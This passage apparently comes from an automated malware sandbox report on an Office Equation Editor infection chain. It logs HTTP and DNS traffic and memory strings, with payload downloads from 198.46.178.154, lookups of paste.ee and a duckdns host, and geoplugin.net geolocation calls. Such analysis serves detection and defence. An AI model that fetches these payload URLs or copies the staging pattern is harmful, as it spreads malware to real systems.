            Source: global trafficHTTP traffic detected: GET /nLNG HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: z2.inkConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /100500/vff/lioniskingandtigerisalsotryingforkingbutdifferentistheattitudeofthistwoanimalaredifferentlionsisalwaysalionitsucantcomparewith__anyotherbecauselionbeauties.doc HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 198.46.178.154Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /100500/lionsandtigerbeautifulpicture.bmp HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 198.46.178.154Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /100500/HWE.txt HTTP/1.1Host: 198.46.178.154Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
            Source: wscript.exe, 00000009.00000003.432521109.0000000003AD2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.431629042.0000000003AD3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.431571140.0000000003AD0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
            Source: global trafficDNS traffic detected: DNS query: z2.ink
            Source: global trafficDNS traffic detected: DNS query: paste.ee
            Source: global trafficDNS traffic detected: DNS query: uploaddeimagens.com.br
            Source: global trafficDNS traffic detected: DNS query: sembe.duckdns.org
            Source: global trafficDNS traffic detected: DNS query: geoplugin.net
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Edge: smart-1.high-performance.networkDate: Mon, 27 May 2024 07:00:28 GMTContent-Length: 102317Server: LINKSGPTCache-Control: no-store, no-cache, must-revalidateConnection: keep-aliveData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 0a 6c 61 6e 67 3d 65 6e 2d 55 53 20 70 72 65 66 69 78 3d 22 6f 67 3a 20 68 74 74 70 73 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 23 22 3e 3c 68 65 61 64 3e 3c 73 74 79 6c 65 3e 69 6d 67 2e 6c 61 7a 79 7b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 70 78 7d 3c 2f 73 74 79 6c 65 3e 3c 6c 69 6e 6b 0a 72 65 6c 3d 70 72 65 6c 6f 61 64 20 68 72 65 66 3d 68 74 74 70 73 3a 2f 2f 64 33 62 74 72 68 65 79 65 6a 6d 69 76 79 2e 63 6c 6f 75 64 66 72 6f 6e 74 2e 6e 65 74 2f 65 64 67 65 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 70 6c 75 67 69 6e 73 2f 77 33 2d 74 6f 74 61 6c 2d 63 61 63 68 65 2f 70 75 62 2f 6a 73 2f 6c 61 7a 79 6c 6f 61 64 2e 6d 69 6e 2e 6a 73 20 61 73 3d 73 63 72 69 70 74 3e 3c 6d 65 74 61 0a 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 3c 6d 65 74 61 0a 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 3c 6c 69 6e 6b 0a 72 65 6c 3d 70 69 6e 67 62 61 63 6b 20 68 72 65 66 3d 68 74 74 70 73 3a 2f 2f 66 61 63 65 2e 6c 69 6e 6b 73 67 70 74 2e 63 6f 6d 2f 65 64 67 65 2f 78 6d 6c 72 70 63 2e 70 68 70 3e 20 3c 73 63 72 69 70 74 3e 64 6f 63 75 6d 65 6e 74 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 2e 63 6c 61 73 73 4e 61 6d 65 20 3d 20 27 6a 73 27 3b 3c 2f 73 63 72 69 70 74 3e 20 3c 6c 69 6e 6b 0a 72 65 6c 3d 70 72 65 63 6f 6e 6e 65 63 74 20 68 72 65 66 3d 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 73 74 61 74 69 63 2e 63 6f 6d 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 3c 73 74 79 6c 65 20 69 64 3d 65 74 2d 64 69 76 69 2d 6f 70 65 6e 2d 73 61 6e 73 2d 69 6e 6c 69 6e 65 2d 63 73 73 3e 2f 2a 3c 21 5b 43 44 41 54 41 5b 2a 2f 2f 2a 20 4f 72 69 67 69 6e 61 6c 3a 20 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 33 30 30 69 74 61 6c 69 63 2c 34 30 30 69 74 61 6c 69 63 2c 36 30 30 69 74 61 6c 69 63 2c 37 30 30 69 74 61 6c 69 63 2c 38 30 30 69 74 61 6c 69 63 2c 34 30 30 2c 33 30 30 2c 36 30 30 2c 37 30 30 2c 38 30 30 26 23 30 33 38 3b 73 75 62 73 65 74 3d 6c 61 74 69 6e 2c 6c 61 74 69 6e 2d 65 78 74 26 23 30 33 38 3b 64 69 73 70 6c 61 79 3d 73 77 61 70 20 2a 2f 2f 2a 20 55 73 65 72 20 41 67 65 6e 74 3a 20 4d 6f 7a 69 6c 6c 61 2f 35 2e 30 20 28 55 6e 6b 6e 6f 77 6e 3b 20 4c 69 6e 75 78 20 78 38 36 5f 36 34 29 20 41 70 70 6c 65 57 65 62 4b 69 74 2f 35 33 38 2e 31 20 28 4b 48 54 4d 4c 2c 20 6c 69 6b 65 20 47 65 63 6b 6f 29 20 53 61 66 61 72 69 2f 35 33 38 2e 31 20 44 61 75 6d 2f 34 2e 31 20 2a 2f 40 66 6f 6e 74 2d 66 61 63 65 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 4f 70 65 6e 20 53 61 6e 73 27 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 20 69 74 61 6c 69 63 3b 6
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Edge: smart-1.high-performance.networkDate: Mon, 27 May 2024 07:00:29 GMTContent-Length: 102317Server: LINKSGPTCache-Control: no-store, no-cache, must-revalidateConnection: keep-aliveData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 0a 6c 61 6e 67 3d 65 6e 2d 55 53 20 70 72 65 66 69 78 3d 22 6f 67 3a 20 68 74 74 70 73 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 23 22 3e 3c 68 65 61 64 3e 3c 73 74 79 6c 65 3e 69 6d 67 2e 6c 61 7a 79 7b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 70 78 7d 3c 2f 73 74 79 6c 65 3e 3c 6c 69 6e 6b 0a 72 65 6c 3d 70 72 65 6c 6f 61 64 20 68 72 65 66 3d 68 74 74 70 73 3a 2f 2f 64 33 62 74 72 68 65 79 65 6a 6d 69 76 79 2e 63 6c 6f 75 64 66 72 6f 6e 74 2e 6e 65 74 2f 65 64 67 65 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 70 6c 75 67 69 6e 73 2f 77 33 2d 74 6f 74 61 6c 2d 63 61 63 68 65 2f 70 75 62 2f 6a 73 2f 6c 61 7a 79 6c 6f 61 64 2e 6d 69 6e 2e 6a 73 20 61 73 3d 73 63 72 69 70 74 3e 3c 6d 65 74 61 0a 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 3c 6d 65 74 61 0a 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 3c 6c 69 6e 6b 0a 72 65 6c 3d 70 69 6e 67 62 61 63 6b 20 68 72 65 66 3d 68 74 74 70 73 3a 2f 2f 66 61 63 65 2e 6c 69 6e 6b 73 67 70 74 2e 63 6f 6d 2f 65 64 67 65 2f 78 6d 6c 72 70 63 2e 70 68 70 3e 20 3c 73 63 72 69 70 74 3e 64 6f 63 75 6d 65 6e 74 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 2e 63 6c 61 73 73 4e 61 6d 65 20 3d 20 27 6a 73 27 3b 3c 2f 73 63 72 69 70 74 3e 20 3c 6c 69 6e 6b 0a 72 65 6c 3d 70 72 65 63 6f 6e 6e 65 63 74 20 68 72 65 66 3d 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 73 74 61 74 69 63 2e 63 6f 6d 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 3c 73 74 79 6c 65 20 69 64 3d 65 74 2d 64 69 76 69 2d 6f 70 65 6e 2d 73 61 6e 73 2d 69 6e 6c 69 6e 65 2d 63 73 73 3e 2f 2a 3c 21 5b 43 44 41 54 41 5b 2a 2f 2f 2a 20 4f 72 69 67 69 6e 61 6c 3a 20 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 33 30 30 69 74 61 6c 69 63 2c 34 30 30 69 74 61 6c 69 63 2c 36 30 30 69 74 61 6c 69 63 2c 37 30 30 69 74 61 6c 69 63 2c 38 30 30 69 74 61 6c 69 63 2c 34 30 30 2c 33 30 30 2c 36 30 30 2c 37 30 30 2c 38 30 30 26 23 30 33 38 3b 73 75 62 73 65 74 3d 6c 61 74 69 6e 2c 6c 61 74 69 6e 2d 65 78 74 26 23 30 33 38 3b 64 69 73 70 6c 61 79 3d 73 77 61 70 20 2a 2f 2f 2a 20 55 73 65 72 20 41 67 65 6e 74 3a 20 4d 6f 7a 69 6c 6c 61 2f 35 2e 30 20 28 55 6e 6b 6e 6f 77 6e 3b 20 4c 69 6e 75 78 20 78 38 36 5f 36 34 29 20 41 70 70 6c 65 57 65 62 4b 69 74 2f 35 33 38 2e 31 20 28 4b 48 54 4d 4c 2c 20 6c 69 6b 65 20 47 65 63 6b 6f 29 20 53 61 66 61 72 69 2f 35 33 38 2e 31 20 44 61 75 6d 2f 34 2e 31 20 2a 2f 40 66 6f 6e 74 2d 66 61 63 65 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 4f 70 65 6e 20 53 61 6e 73 27 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 20 69 74 61 6c 69 63 3b 6
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Edge: smart-1.high-performance.networkDate: Mon, 27 May 2024 07:00:30 GMTContent-Length: 102317Server: LINKSGPTCache-Control: no-store, no-cache, must-revalidateConnection: keep-aliveData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 0a 6c 61 6e 67 3d 65 6e 2d 55 53 20 70 72 65 66 69 78 3d 22 6f 67 3a 20 68 74 74 70 73 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 23 22 3e 3c 68 65 61 64 3e 3c 73 74 79 6c 65 3e 69 6d 67 2e 6c 61 7a 79 7b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 70 78 7d 3c 2f 73 74 79 6c 65 3e 3c 6c 69 6e 6b 0a 72 65 6c 3d 70 72 65 6c 6f 61 64 20 68 72 65 66 3d 68 74 74 70 73 3a 2f 2f 64 33 62 74 72 68 65 79 65 6a 6d 69 76 79 2e 63 6c 6f 75 64 66 72 6f 6e 74 2e 6e 65 74 2f 65 64 67 65 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 70 6c 75 67 69 6e 73 2f 77 33 2d 74 6f 74 61 6c 2d 63 61 63 68 65 2f 70 75 62 2f 6a 73 2f 6c 61 7a 79 6c 6f 61 64 2e 6d 69 6e 2e 6a 73 20 61 73 3d 73 63 72 69 70 74 3e 3c 6d 65 74 61 0a 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 3c 6d 65 74 61 0a 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 3c 6c 69 6e 6b 0a 72 65 6c 3d 70 69 6e 67 62 61 63 6b 20 68 72 65 66 3d 68 74 74 70 73 3a 2f 2f 66 61 63 65 2e 6c 69 6e 6b 73 67 70 74 2e 63 6f 6d 2f 65 64 67 65 2f 78 6d 6c 72 70 63 2e 70 68 70 3e 20 3c 73 63 72 69 70 74 3e 64 6f 63 75 6d 65 6e 74 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 2e 63 6c 61 73 73 4e 61 6d 65 20 3d 20 27 6a 73 27 3b 3c 2f 73 63 72 69 70 74 3e 20 3c 6c 69 6e 6b 0a 72 65 6c 3d 70 72 65 63 6f 6e 6e 65 63 74 20 68 72 65 66 3d 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 73 74 61 74 69 63 2e 63 6f 6d 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 3c 73 74 79 6c 65 20 69 64 3d 65 74 2d 64 69 76 69 2d 6f 70 65 6e 2d 73 61 6e 73 2d 69 6e 6c 69 6e 65 2d 63 73 73 3e 2f 2a 3c 21 5b 43 44 41 54 41 5b 2a 2f 2f 2a 20 4f 72 69 67 69 6e 61 6c 3a 20 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 33 30 30 69 74 61 6c 69 63 2c 34 30 30 69 74 61 6c 69 63 2c 36 30 30 69 74 61 6c 69 63 2c 37 30 30 69 74 61 6c 69 63 2c 38 30 30 69 74 61 6c 69 63 2c 34 30 30 2c 33 30 30 2c 36 30 30 2c 37 30 30 2c 38 30 30 26 23 30 33 38 3b 73 75 62 73 65 74 3d 6c 61 74 69 6e 2c 6c 61 74 69 6e 2d 65 78 74 26 23 30 33 38 3b 64 69 73 70 6c 61 79 3d 73 77 61 70 20 2a 2f 2f 2a 20 55 73 65 72 20 41 67 65 6e 74 3a 20 4d 6f 7a 69 6c 6c 61 2f 35 2e 30 20 28 55 6e 6b 6e 6f 77 6e 3b 20 4c 69 6e 75 78 20 78 38 36 5f 36 34 29 20 41 70 70 6c 65 57 65 62 4b 69 74 2f 35 33 38 2e 31 20 28 4b 48 54 4d 4c 2c 20 6c 69 6b 65 20 47 65 63 6b 6f 29 20 53 61 66 61 72 69 2f 35 33 38 2e 31 20 44 61 75 6d 2f 34 2e 31 20 2a 2f 40 66 6f 6e 74 2d 66 61 63 65 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 4f 70 65 6e 20 53 61 6e 73 27 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 20 69 74 61 6c 69 63 3b 6
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Edge: smart-1.high-performance.networkDate: Mon, 27 May 2024 07:00:36 GMTContent-Length: 102317Server: LINKSGPTCache-Control: no-store, no-cache, must-revalidateConnection: keep-aliveData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 0a 6c 61 6e 67 3d 65 6e 2d 55 53 20 70 72 65 66 69 78 3d 22 6f 67 3a 20 68 74 74 70 73 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 23 22 3e 3c 68 65 61 64 3e 3c 73 74 79 6c 65 3e 69 6d 67 2e 6c 61 7a 79 7b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 70 78 7d 3c 2f 73 74 79 6c 65 3e 3c 6c 69 6e 6b 0a 72 65 6c 3d 70 72 65 6c 6f 61 64 20 68 72 65 66 3d 68 74 74 70 73 3a 2f 2f 64 33 62 74 72 68 65 79 65 6a 6d 69 76 79 2e 63 6c 6f 75 64 66 72 6f 6e 74 2e 6e 65 74 2f 65 64 67 65 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 70 6c 75 67 69 6e 73 2f 77 33 2d 74 6f 74 61 6c 2d 63 61 63 68 65 2f 70 75 62 2f 6a 73 2f 6c 61 7a 79 6c 6f 61 64 2e 6d 69 6e 2e 6a 73 20 61 73 3d 73 63 72 69 70 74 3e 3c 6d 65 74 61 0a 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 3c 6d 65 74 61 0a 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 3c 6c 69 6e 6b 0a 72 65 6c 3d 70 69 6e 67 62 61 63 6b 20 68 72 65 66 3d 68 74 74 70 73 3a 2f 2f 66 61 63 65 2e 6c 69 6e 6b 73 67 70 74 2e 63 6f 6d 2f 65 64 67 65 2f 78 6d 6c 72 70 63 2e 70 68 70 3e 20 3c 73 63 72 69 70 74 3e 64 6f 63 75 6d 65 6e 74 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 2e 63 6c 61 73 73 4e 61 6d 65 20 3d 20 27 6a 73 27 3b 3c 2f 73 63 72 69 70 74 3e 20 3c 6c 69 6e 6b 0a 72 65 6c 3d 70 72 65 63 6f 6e 6e 65 63 74 20 68 72 65 66 3d 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 73 74 61 74 69 63 2e 63 6f 6d 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 3c 73 74 79 6c 65 20 69 64 3d 65 74 2d 64 69 76 69 2d 6f 70 65 6e 2d 73 61 6e 73 2d 69 6e 6c 69 6e 65 2d 63 73 73 3e 2f 2a 3c 21 5b 43 44 41 54 41 5b 2a 2f 2f 2a 20 4f 72 69 67 69 6e 61 6c 3a 20 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 33 30 30 69 74 61 6c 69 63 2c 34 30 30 69 74 61 6c 69 63 2c 36 30 30 69 74 61 6c 69 63 2c 37 30 30 69 74 61 6c 69 63 2c 38 30 30 69 74 61 6c 69 63 2c 34 30 30 2c 33 30 30 2c 36 30 30 2c 37 30 30 2c 38 30 30 26 23 30 33 38 3b 73 75 62 73 65 74 3d 6c 61 74 69 6e 2c 6c 61 74 69 6e 2d 65 78 74 26 23 30 33 38 3b 64 69 73 70 6c 61 79 3d 73 77 61 70 20 2a 2f 2f 2a 20 55 73 65 72 20 41 67 65 6e 74 3a 20 4d 6f 7a 69 6c 6c 61 2f 35 2e 30 20 28 55 6e 6b 6e 6f 77 6e 3b 20 4c 69 6e 75 78 20 78 38 36 5f 36 34 29 20 41 70 70 6c 65 57 65 62 4b 69 74 2f 35 33 38 2e 31 20 28 4b 48 54 4d 4c 2c 20 6c 69 6b 65 20 47 65 63 6b 6f 29 20 53 61 66 61 72 69 2f 35 33 38 2e 31 20 44 61 75 6d 2f 34 2e 31 20 2a 2f 40 66 6f 6e 74 2d 66 61 63 65 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 4f 70 65 6e 20 53 61 6e 73 27 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 20 69 74 61 6c 69 63 3b 6
            Source: EQNEDT32.EXE, 00000007.00000002.425990607.000000000061F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://198.46.178.154/100500/lionsandtigerbeautifulpicture.bmp
            Source: EQNEDT32.EXE, 00000007.00000002.425990607.000000000061F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://198.46.178.154/100500/lionsandtigerbeautifulpicture.bmpj
            Source: EQNEDT32.EXE, 00000007.00000002.425990607.000000000061F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://198.46.178.154/100500/lionsandtigerbeautifulpicture.bmpw
            Source: wscript.exe, 00000009.00000003.432521109.0000000003AD2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.431629042.0000000003AD3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.431571140.0000000003AD0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.431892049.0000000003AD2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.436432327.0000000003AD3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.431591415.0000000003AD3000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.477785176.0000000005030000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
            Source: wscript.exe, 00000009.00000003.432521109.0000000003AD2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.431629042.0000000003AD3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.431571140.0000000003AD0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.431892049.0000000003AD2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.436432327.0000000003AD3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.431591415.0000000003AD3000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.477785176.0000000005030000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
            Source: wscript.exe, 00000009.00000003.432521109.0000000003AD2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.431629042.0000000003AD3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.431571140.0000000003AD0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.431892049.0000000003AD2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.436432327.0000000003AD3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.431591415.0000000003AD3000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.477785176.0000000005030000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
            Source: wscript.exe, 00000009.00000003.432521109.0000000003AD2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.431629042.0000000003AD3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.431571140.0000000003AD0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.431892049.0000000003AD2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.436432327.0000000003AD3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.431591415.0000000003AD3000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.477785176.0000000005030000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
            Source: wscript.exe, 00000009.00000003.432521109.0000000003AD2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.431629042.0000000003AD3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.431571140.0000000003AD0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.431892049.0000000003AD2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.436432327.0000000003AD3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.431591415.0000000003AD3000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.477785176.0000000005030000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
            Source: wscript.exe, 00000009.00000003.432521109.0000000003AD2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.431629042.0000000003AD3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.431571140.0000000003AD0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.431892049.0000000003AD2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.436432327.0000000003AD3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.431591415.0000000003AD3000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.477785176.0000000005030000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
            Source: wscript.exe, 00000009.00000003.432521109.0000000003AD2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.431629042.0000000003AD3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.431571140.0000000003AD0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.431892049.0000000003AD2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.436432327.0000000003AD3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.431591415.0000000003AD3000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.477785176.0000000005030000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
            Source: RegAsm.exe, RegAsm.exe, 00000011.00000002.1078551055.00000000008E6000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000011.00000002.1078551055.0000000000895000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp
            Source: powershell.exe, 0000000C.00000002.466787853.0000000004477000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp/C
            Source: powershell.exe, 0000000C.00000002.466787853.0000000003799000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
            Source: wscript.exe, 00000009.00000003.432521109.0000000003AD2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.431629042.0000000003AD3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.431571140.0000000003AD0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.431892049.0000000003AD2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.436432327.0000000003AD3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.431591415.0000000003AD3000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.477785176.0000000005030000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
            Source: wscript.exe, 00000009.00000003.432521109.0000000003AD2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.431629042.0000000003AD3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.431571140.0000000003AD0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.431892049.0000000003AD2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.436432327.0000000003AD3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.431591415.0000000003AD3000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.477785176.0000000005030000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
            Source: wscript.exe, 00000009.00000003.432521109.0000000003AD2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.431629042.0000000003AD3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.431571140.0000000003AD0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.431892049.0000000003AD2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.436432327.0000000003AD3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.431591415.0000000003AD3000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.477785176.0000000005030000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
